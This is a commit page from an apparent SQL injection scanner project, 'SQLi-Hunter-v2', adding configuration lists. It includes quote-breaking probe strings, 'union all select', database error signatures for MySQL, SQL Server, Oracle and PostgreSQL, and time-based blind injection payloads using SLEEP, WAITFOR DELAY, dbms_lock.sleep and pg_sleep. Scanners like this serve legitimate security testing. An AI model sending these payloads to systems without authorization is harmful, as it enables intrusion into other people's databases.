Projects STRLCPY SQLi-Hunter-v2 Commits 631d2e6e
🤬
  • ■ ■ ■ ■ ■ ■
    config/SQLi-detectors.txt
     1 +'123
     2 +''123
     3 +`123
     4 +")123
     5 +"))123
     6 +`)123
     7 +`))123
     8 +'))123
     9 +')123"123
     10 +[]123
     11 +""123
     12 +'"123
     13 +"'123
     14 +\123
     15 + union all select
  • ■ ■ ■ ■ ■ ■
    config/SQLi-errrors.txt
     1 +mysql_fetch_array()
     2 +mysql_num_rows()
     3 +Error Occurred While Processing Request
     4 +Server Error in'/'Application
     5 +Microsoft OLE DB Provider for ODBC Drivers error
     6 +error in your SQL syntax
     7 +VBScript Runtime
     8 +ADODB.Field
     9 +BOF or EOF
     10 +ADODB.command
     11 +JET Database
     12 +Syntax error
     13 +mysql_fetch_row()
     14 +include()
     15 +mysql_fetch_assoc()
     16 +mysql_fetch_object()
     17 +mysql_numrows()
     18 +GetArray()
     19 +FetchRow()
     20 +Input string was not in a correct format
     21 +Microsoft VBScript;
     22 +Invalid Querystring
     23 +OLE DB Provider for ODBC
  • ■ ■ ■ ■ ■ ■
    config/Suggestions.txt
     1 +These information are not going to be used by the program, you can add them yourself to the files here
     2 +
     3 +Some examples of common SQL error messages that may indicate a SQL injection vulnerability:
     4 + MySQL and MariaDB:
     5 + You have an error in your SQL syntax
     6 + Unknown column
     7 + Unknown table
     8 + Table 'xxx' doesn't exist
     9 + Column 'xxx' in table 'xxx' is ambiguous
     10 + Unterminated string at line xxx
     11 + Data truncated for column 'xxx' at row xxx
     12 +
     13 + Microsoft SQL Server and Sybase:
     14 + Unclosed quotation mark
     15 + Incorrect syntax near
     16 + Could not find stored procedure
     17 + Invalid column name
     18 + Invalid object name
     19 + Subquery returned more than 1 value
     20 + Divide by zero error
     21 +
     22 + Oracle:
     23 + ORA-01756
     24 + ORA-00933
     25 + ORA-00904
     26 + ORA-01722
     27 + ORA-01789
     28 + ORA-01403
     29 + ORA-01400
     30 + ORA-00921
     31 + ORA-00942
     32 +
     33 + PostgreSQL:
     34 + ERROR: column "xxx" does not exist
     35 + ERROR: relation "xxx" does not exist
     36 + ERROR: syntax error at or near "xxx"
     37 + ERROR: current transaction is aborted
     38 + ERROR: operator does not exist
     39 + ERROR: function xxx(xxx) does not exist
     40 + ERROR: value too long for type character
  • ■ ■ ■ ■ ■ ■
    config/blind-SQLi-detectors.txt
     1 +' OR SLEEP(5)=0 #
     2 +' OR SLEEP(5)=0/*
     3 +' OR SLEEP(5)=0%23
     4 +' OR SLEEP(5)=0%2F%2A
     5 +' OR WAITFOR DELAY '00:00:05' --
     6 +'; WAITFOR DELAY '00:00:05' --
     7 +') WAITFOR DELAY '00:00:05' --
     8 +' OR WAITFOR DELAY '00:00:05' %23
     9 +' OR dbms_lock.sleep(5)='1' --
     10 +' OR dbms_lock.sleep(5)='1' %23
     11 +' OR dbms_lock.sleep(5)='1' /*
     12 +' OR dbms_lock.sleep(5)='1' %2F%2A
     13 +' OR pg_sleep(5)=0 --
     14 +' OR pg_sleep(5)=0 %23
     15 +' OR pg_sleep(5)=0 /*
     16 +' OR pg_sleep(5)=0 %2F%2A
     17 + 
Please wait...
Page is in error, reload to recover